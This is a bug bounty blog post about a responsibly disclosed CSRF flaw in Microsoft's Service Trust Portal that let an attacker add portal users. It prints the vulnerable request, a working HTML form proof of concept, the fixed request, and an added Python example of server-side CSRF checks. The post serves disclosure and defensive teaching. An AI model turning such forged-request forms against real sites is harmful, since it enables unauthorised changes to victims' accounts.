Microsoft - CSRF Bug - Add Users in their Cloud Service Trust Portal



In this blog post I will show you an easy CSRF bug which I found on a Microsoft platform. Not only that, I will reiterate why it is important to keep trying.

If you follow me on Twitter, then you must know that I sometimes (sorry, regularly) post #NeverGiveUp sort of tweets. The best reason I can give you is the example of my experience with the Microsoft bug bounty program.

Talking about the Microsoft bug bounty, the first point is that they only accept submissions which are high impact. Big `NO` to low-hanging fruit and big `NO` if you cannot exploit the bug. I sent 10+ bug reports to the Microsoft security team; this includes some low-hanging fruit and some bugs which I was not able to exploit. All were marked as NA. Well, it's but obvious: after all this failure, when my mind tells me to give up on this, I tell myself.




So after spending hours, days and months, I finally got the HIT called SUCCESS.
(Keep Trying #NeverGiveUp)

Let's move on to the PoC.

Introduction:-

I was testing one of Microsoft's domains - Service Trust Portal (STP).
During the testing, I came across the feature below in their portal, where you can add portal users and portal admins.


The Add User feature caught my attention. Generally speaking, while checking out an application I always try to correlate the application workflow with the different attack vectors which I can execute (some tips to try in the wild ...XD), so that time I straight away thought about CSRF.


POC:- 

HTTP Request:-

```http
GET /onboarding/AddUserRole/1110?role=User HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Cookie: [Some_value]
Connection: keep-alive
```

From the above HTTP request we can conclude that there is no CSRF token present.
By using this loophole I was able to add user roles on behalf of the admin user.

Exploitation:-

```html
<html>
  <body>
    <form action="https://trustportal.office.com/onboarding/AddUserRole/1110">
      <input type="hidden" name="role" value="User" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

So I was able to add any user in their Cloud Service Trust Portal by using a CSRF attack.

How they fixed it:-

```http
POST /onboarding/AddUserRole HTTP/1.1
Host: trustportal.office.com
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json; charset=utf-8
X-Requested-With: XMLHttpRequest
Referer: https://trustportal.office.com/Onboarding/AddUserRole
Content-Length: 29
Cookie: [Some_value]
Connection: keep-alive

{"user":"test","role":"User"}
```
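
An added example (not from the original post, and not Microsoft's code): a hypothetical server-side policy that accepts only requests shaped like the fixed one above, run against constructed samples. The function name, the individual checks and the `other-site.example` host are assumptions; the post shows only the request, not the server logic.

```python
from urllib.parse import urlsplit

TRUSTED_HOST = "trustportal.office.com"       # host taken from the requests in the post
PROTECTED_PREFIX = "/onboarding/adduserrole"  # endpoint taken from the post


def check_request(method, path, headers):
    """Return (allowed, reason) for a request; hypothetical server-side policy."""
    h = {k.lower(): v for k, v in headers.items()}
    if not path.lower().startswith(PROTECTED_PREFIX):
        return True, "not a protected endpoint"
    # 1. GET must never change state: links, images and GET forms can all issue it.
    if method.upper() != "POST":
        return False, "state change requires POST"
    # 2. A cross-site <form> can only send urlencoded, multipart or text/plain bodies.
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, "content type must be application/json"
    # 3. A form cannot set custom headers; cross-origin script needs a CORS preflight.
    if h.get("x-requested-with") != "XMLHttpRequest":
        return False, "missing X-Requested-With header"
    # 4. Origin, or Referer when Origin is absent, must point at the portal itself.
    source = h.get("origin") or h.get("referer", "")
    if urlsplit(source).hostname != TRUSTED_HOST:
        return False, "request did not originate from the portal"
    return True, "ok"


# Constructed samples. The first two mirror the requests shown in the post, with the
# Referer of the first changed to a placeholder site, as a cross-site form would send it.
SAMPLES = {
    "original GET via cross-site form": ("GET", "/onboarding/AddUserRole/1110?role=User",
        {"Referer": "https://other-site.example/page.html", "Cookie": "[Some_value]"}),
    "fixed XHR POST": ("POST", "/onboarding/AddUserRole",
        {"Content-Type": "application/json; charset=utf-8",
         "X-Requested-With": "XMLHttpRequest",
         "Referer": "https://trustportal.office.com/Onboarding/AddUserRole",
         "Cookie": "[Some_value]"}),
    "cross-site form POST": ("POST", "/onboarding/AddUserRole",
        {"Content-Type": "text/plain", "Origin": "https://other-site.example",
         "Cookie": "[Some_value]"}),
}


def evaluate_samples():
    return {name: check_request(*req) for name, req in SAMPLES.items()}


if __name__ == "__main__":
    for name, (allowed, reason) in evaluate_samples().items():
        print(f"{name:35} allowed={allowed}  {reason}")
```

A per-session anti-CSRF token is still the standard control; header checks like these are an extra layer on top of it.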

They listed me in their Hall of Fame and rewarded me with the bounty.

Moral Of The Story:- 
Stay focused, Don't Quit, keep trying #BelieveThat

Vulnerability timeline:

Feb 14, 2016: Reported to Microsoft Security Response Center.
Feb 20, 2016: Received initial reply from Microsoft team. Report triaged.
Feb 25, 2016: Microsoft Security Team successfully reproduced the bug.
Mar 16, 2016: Microsoft Security Team fixed the reported bug.
Apr 01, 2016: Bounty of $500 awarded by Microsoft.
June 19, 2016: Public responsible disclosure.

